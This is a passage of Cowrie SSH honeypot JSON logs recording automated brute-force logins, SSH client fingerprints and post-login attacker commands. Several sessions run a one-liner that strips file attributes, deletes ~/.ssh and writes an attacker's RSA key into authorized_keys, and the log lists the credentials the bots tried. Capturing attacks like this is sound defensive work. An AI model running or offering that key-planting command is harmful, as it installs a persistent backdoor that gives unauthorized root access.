ha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T00:49:04.640073Z","src_ip":"212.227.235.229","session":"239641f4d884"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T00:49:05.593167Z","src_ip":"212.227.235.229","session":"239641f4d884"}
{"eventid":"cowrie.session.closed","duration":"2.4","message":"Connection lost after 2.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:49:06.824171Z","src_ip":"212.227.235.229","session":"239641f4d884"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":43357,"dst_ip":"1.2.3.4","dst_port":22,"session":"dd1534aac0db","protocol":"ssh","message":"New connection: 212.227.235.229:43357 (1.2.3.4:22) [session: dd1534aac0db]","sensor":"my-vps","timestamp":"2025-08-26T00:49:07.047584Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:49:07.048341Z","src_ip":"212.227.235.229","session":"dd1534aac0db"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T00:49:07.272325Z","src_ip":"212.227.235.229","session":"dd1534aac0db"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:49:08.211257Z","src_ip":"212.227.235.229","session":"dd1534aac0db"}
{"eventid":"cowrie.session.closed","duration":"7.0","message":"Connection lost after 7.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:49:08.437392Z","src_ip":"212.227.235.229","session":"96e6b2f3e98b"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:49:08.438433Z","src_ip":"212.227.235.229","session":"dd1534aac0db"}
{"eventid":"cowrie.session.closed","duration":120.00396513938904,"message":"Connection lost after 120 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:49:26.263123Z","src_ip":"111.255.213.146","session":"0b310fdfb06b"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":54562,"dst_ip":"1.2.3.4","dst_port":22,"session":"44c246f03fc2","protocol":"ssh","message":"New connection: 217.72.205.35:54562 (1.2.3.4:22) [session: 44c246f03fc2]","sensor":"my-vps","timestamp":"2025-08-26T00:49:30.489023Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:49:30.490113Z","src_ip":"217.72.205.35","session":"44c246f03fc2"}
{"eventid":"cowrie.session.connect","src_ip":"36.89.28.139","src_port":58072,"dst_ip":"1.2.3.4","dst_port":22,"session":"f9bc1e8daaf8","protocol":"ssh","message":"New connection: 36.89.28.139:58072 (1.2.3.4:22) [session: f9bc1e8daaf8]","sensor":"my-vps","timestamp":"2025-08-26T00:49:53.053139Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:49:53.054049Z","src_ip":"36.89.28.139","session":"f9bc1e8daaf8"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T00:49:53.272927Z","src_ip":"36.89.28.139","session":"f9bc1e8daaf8"}
{"eventid":"cowrie.login.success","username":"root","password":"teste","message":"login attempt [root/teste] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:49:54.801217Z","src_ip":"36.89.28.139","session":"f9bc1e8daaf8"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T00:49:55.245887Z","src_ip":"36.89.28.139","session":"f9bc1e8daaf8"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T00:49:55.246803Z","src_ip":"36.89.28.139","session":"f9bc1e8daaf8"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T00:49:55.247647Z","src_ip":"36.89.28.139","session":"f9bc1e8daaf8"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:49:55.466246Z","src_ip":"36.89.28.139","session":"f9bc1e8daaf8"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T00:49:55.994840Z","src_ip":"36.89.28.139","session":"f9bc1e8daaf8"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T00:49:55.995562Z","src_ip":"36.89.28.139","session":"f9bc1e8daaf8"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T00:49:56.210117Z","src_ip":"36.89.28.139","session":"f9bc1e8daaf8"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:49:56.210962Z","src_ip":"36.89.28.139","session":"f9bc1e8daaf8"}
{"eventid":"cowrie.session.connect","src_ip":"36.89.28.139","src_port":53500,"dst_ip":"1.2.3.4","dst_port":22,"session":"84992f67e6fc","protocol":"ssh","message":"New connection: 36.89.28.139:53500 (1.2.3.4:22) [session: 84992f67e6fc]","sensor":"my-vps","timestamp":"2025-08-26T00:49:56.386825Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:49:56.387675Z","src_ip":"36.89.28.139","session":"84992f67e6fc"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T00:49:56.565673Z","src_ip":"36.89.28.139","session":"84992f67e6fc"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T00:49:58.281124Z","src_ip":"36.89.28.139","session":"84992f67e6fc"}
{"eventid":"cowrie.session.closed","duration":"3.1","message":"Connection lost after 3.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:49:59.461119Z","src_ip":"36.89.28.139","session":"84992f67e6fc"}
{"eventid":"cowrie.session.connect","src_ip":"36.89.28.139","src_port":53514,"dst_ip":"1.2.3.4","dst_port":22,"session":"02d3e10f9ec4","protocol":"ssh","message":"New connection: 36.89.28.139:53514 (1.2.3.4:22) [session: 02d3e10f9ec4]","sensor":"my-vps","timestamp":"2025-08-26T00:49:59.680210Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:49:59.680971Z","src_ip":"36.89.28.139","session":"02d3e10f9ec4"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T00:49:59.887947Z","src_ip":"36.89.28.139","session":"02d3e10f9ec4"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:50:01.700194Z","src_ip":"36.89.28.139","session":"02d3e10f9ec4"}
{"eventid":"cowrie.session.closed","duration":"8.9","message":"Connection lost after 8.9 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:50:01.904628Z","src_ip":"36.89.28.139","session":"f9bc1e8daaf8"}
{"eventid":"cowrie.session.closed","duration":"2.2","message":"Connection lost after 2.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:50:01.919219Z","src_ip":"36.89.28.139","session":"02d3e10f9ec4"}
{"eventid":"cowrie.session.connect","src_ip":"24.108.102.132","src_port":45048,"dst_ip":"1.2.3.4","dst_port":22,"session":"ea40f2e1023e","protocol":"ssh","message":"New connection: 24.108.102.132:45048 (1.2.3.4:22) [session: ea40f2e1023e]","sensor":"my-vps","timestamp":"2025-08-26T00:50:08.530996Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:50:08.536471Z","src_ip":"24.108.102.132","session":"ea40f2e1023e"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T00:50:08.709613Z","src_ip":"24.108.102.132","session":"ea40f2e1023e"}
{"eventid":"cowrie.login.success","username":"root","password":"abc-1234","message":"login attempt [root/abc-1234] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:50:09.403736Z","src_ip":"24.108.102.132","session":"ea40f2e1023e"}
{"eventid":"cowrie.session.connect","src_ip":"45.159.112.103","src_port":35926,"dst_ip":"1.2.3.4","dst_port":22,"session":"42337ca65c59","protocol":"ssh","message":"New connection: 45.159.112.103:35926 (1.2.3.4:22) [session: 42337ca65c59]","sensor":"my-vps","timestamp":"2025-08-26T00:50:09.568432Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:50:09.570025Z","src_ip":"45.159.112.103","session":"42337ca65c59"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T00:50:09.678030Z","src_ip":"45.159.112.103","session":"42337ca65c59"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T00:50:09.773264Z","src_ip":"24.108.102.132","session":"ea40f2e1023e"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T00:50:09.773954Z","src_ip":"24.108.102.132","session":"ea40f2e1023e"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T00:50:09.775162Z","src_ip":"24.108.102.132","session":"ea40f2e1023e"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:50:09.949781Z","src_ip":"24.108.102.132","session":"ea40f2e1023e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":56588,"dst_ip":"1.2.3.4","dst_port":22,"session":"fb1b087b2a83","protocol":"ssh","message":"New connection: 212.227.235.229:56588 (1.2.3.4:22) [session: fb1b087b2a83]","sensor":"my-vps","timestamp":"2025-08-26T00:50:10.143696Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:50:10.144495Z","src_ip":"212.227.235.229","session":"fb1b087b2a83"}
{"eventid":"cowrie.login.success","username":"root","password":"qwe123","message":"login attempt [root/qwe123] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:50:10.150148Z","src_ip":"45.159.112.103","session":"42337ca65c59"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T00:50:10.246676Z","src_ip":"212.227.235.229","session":"fb1b087b2a83"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T00:50:10.404891Z","src_ip":"24.108.102.132","session":"ea40f2e1023e"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T00:50:10.405695Z","src_ip":"24.108.102.132","session":"ea40f2e1023e"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T00:50:10.464812Z","src_ip":"45.159.112.103","session":"42337ca65c59"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T00:50:10.465529Z","src_ip":"45.159.112.103","session":"42337ca65c59"}
